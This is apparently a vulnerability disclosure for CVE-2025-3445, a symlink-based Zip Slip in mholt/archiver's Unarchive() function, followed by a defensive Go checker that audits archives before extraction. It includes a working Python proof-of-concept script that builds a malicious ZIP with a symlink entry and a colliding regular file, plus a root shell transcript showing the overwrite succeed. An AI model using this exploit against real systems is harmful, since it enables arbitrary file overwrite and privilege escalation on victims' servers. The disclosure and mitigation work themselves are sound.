mholt/archiver — CVE-2025-3445

Affected versions (>=3.0.0 <4.0.0-alpha.1) of this package are vulnerable to Arbitrary File Write via Archive Extraction (Zip Slip) in the Unarchive() function. An attacker can overwrite sensitive files and potentially escalate privileges by supplying a malicious archive file containing symlinks, which is unarchived by the vulnerable application.

A very similar vulnerability was found in TAR files (CVE-2024-0406).

Although a fix was implemented, it hasn't been officially released, and the affected project has since been deprecated. The successor to mholt/archiver is a new project called mholt/archives, and its initial release (v0.1.0) removes the Unarchive() functionality.

PoC || GTFO

```bash
» python3 cve-2025-3445.py /tmp/sessions/admin/fake_session
ZIP file created at cve-2025-3445.zip with symlink pointing to /tmp/sessions/admin/fake_session

# Upload the file to a target that uses the Unarchive() function

root@5af68317d6cb:/app/unarchive/admin# ls -al
total 8
drwxr-xr-x 2 root root 4096 Jun  1 08:11 .
drwxr-xr-x 3 root root 4096 Jun  1 07:02 ..
lrwxrwxrwx 1 root root   32 Jun  1 08:11 x -> /tmp/sessions/admin/fake_session
root@5af68317d6cb:/app/unarchive/admin# cat /tmp/sessions/admin/fake_session
<some-file-content-here>
```
```python
# cve-2025-3445.py
import zipfile
import sys

def create_zip(zip_path, symlink_target):
    with zipfile.ZipFile(zip_path, 'w') as zip_ref:
        symlink_info = zipfile.ZipInfo('./x')
        symlink_info.external_attr = 0o120777 << 16  # symlink type
        zip_ref.writestr(symlink_info, symlink_target)
        # Optional: write content to a normal file if needed
        regular_file_content = b'<some-file-content-here>'
        zip_ref.writestr('x', regular_file_content)

if __name__ == "__main__":
    if len(sys.argv) < 2:
        print(f"Usage: {sys.argv[0]} <path_to_symlink>")
        sys.exit(1)

    symlink_target = sys.argv[1]
    zip_path = "cve-2025-3445.zip"

    create_zip(zip_path, symlink_target)
    print(f"ZIP file created at {zip_path} with symlink pointing to {symlink_target}")
```
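
A pre-extraction check for the archive layout shown above, as an added example in Go (not code from mholt/archiver or from this post): it flags symlink entries, names that leave the destination directory, and names that collide with an earlier entry. `auditZip` and `sampleArchive` are hypothetical names, and the sample archive is constructed in memory with placeholder values.

```go
package main

import (
	"archive/zip"
	"bytes"
	"fmt"
	"io/fs"
	"path"
	"strings"
)

// auditZip lists entries an extractor must refuse: symlinks, names that leave
// the destination, and names that collide with an earlier entry.
func auditZip(zr *zip.Reader) (findings []string) {
	seen := map[string]bool{}
	for _, f := range zr.File {
		name := path.Clean(strings.ReplaceAll(f.Name, `\`, "/"))
		if f.Mode()&fs.ModeSymlink != 0 {
			findings = append(findings, f.Name+": symlink entry")
		}
		if path.IsAbs(name) || name == ".." || strings.HasPrefix(name, "../") {
			findings = append(findings, f.Name+": escapes destination")
		}
		if seen[name] {
			findings = append(findings, f.Name+": duplicates an earlier entry")
		}
		seen[name] = true
	}
	return findings
}

// sampleArchive builds a constructed in-memory ZIP laid out like the PoC above:
// a symlink entry "./x" followed by a regular file "x".
func sampleArchive() *zip.Reader {
	var buf bytes.Buffer
	zw := zip.NewWriter(&buf)
	link := &zip.FileHeader{Name: "./x"}
	link.SetMode(fs.ModeSymlink | 0o777)
	w, _ := zw.CreateHeader(link) // errors ignored: all writes go to memory
	w.Write([]byte("/placeholder/target"))
	w, _ = zw.Create("x")
	w.Write([]byte("placeholder content"))
	zw.Close()
	zr, _ := zip.NewReader(bytes.NewReader(buf.Bytes()), int64(buf.Len()))
	return zr
}

func main() {
	fmt.Println(strings.Join(auditZip(sampleArchive()), "\n"))
}
```

An application that still depends on `Unarchive()` can run a check like this on uploads and reject any archive that produces findings before extraction is attempted.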